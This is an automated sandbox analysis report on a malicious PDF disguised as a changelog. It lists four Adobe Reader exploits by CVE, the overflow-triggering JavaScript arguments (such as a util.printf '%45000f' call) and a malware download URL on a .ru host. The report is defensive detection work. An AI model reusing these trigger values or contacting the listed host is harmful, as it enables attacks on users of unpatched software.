Analysis report for jkjom_com-ChangeLog_pdf.bin
Sample Overview
| Field | Value |
|---|---|
| File | jkjom_com-ChangeLog_pdf.bin |
| MD5 | ab056c0e261160aeabe56836e21b4408 |
| Analysis Started | 2010-02-17 17:46:47 |
| Report Generated | 2010-02-18 00:36:03 |
| Jsand version | 1.02.02 |
Detection results
| Detector | Result |
|---|---|
| Jsand 1.02.02 | malicious |
Exploits
| Name | Description | Reference |
|---|---|---|
| Adobe Collab overflow | Multiple Adobe Reader and Acrobat buffer overflows | CVE-2007-5659 |
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927 |
| doc.media.newPlayer | Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2 | CVE-2009-4324 |
Deobfuscation results
Evals
No evals.
Writes
No writes.
Network Activity
Requests
| URL |
|---|
| file://jkjom_com-ChangeLog_pdf.bin |
ActiveX controls
AcrobatJavaScript
| Name | Arg0 | Arg1 | Count |
|---|---|---|---|
| Methods | | | |
| media.newPlayer | (null) | | 1 |
| Collab.getIcon | N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ .................................................................. | | 1 |
| Collab.collectEmailInfo | '' | e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c | 1 |
| util.printf | %45000f | 1.3E295 | 1 |
| info.Author | | | 4 |
Shellcode and Malware
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://yournewzip.ru:8080/main.php?id=6&hello314 | N/A | N/A | |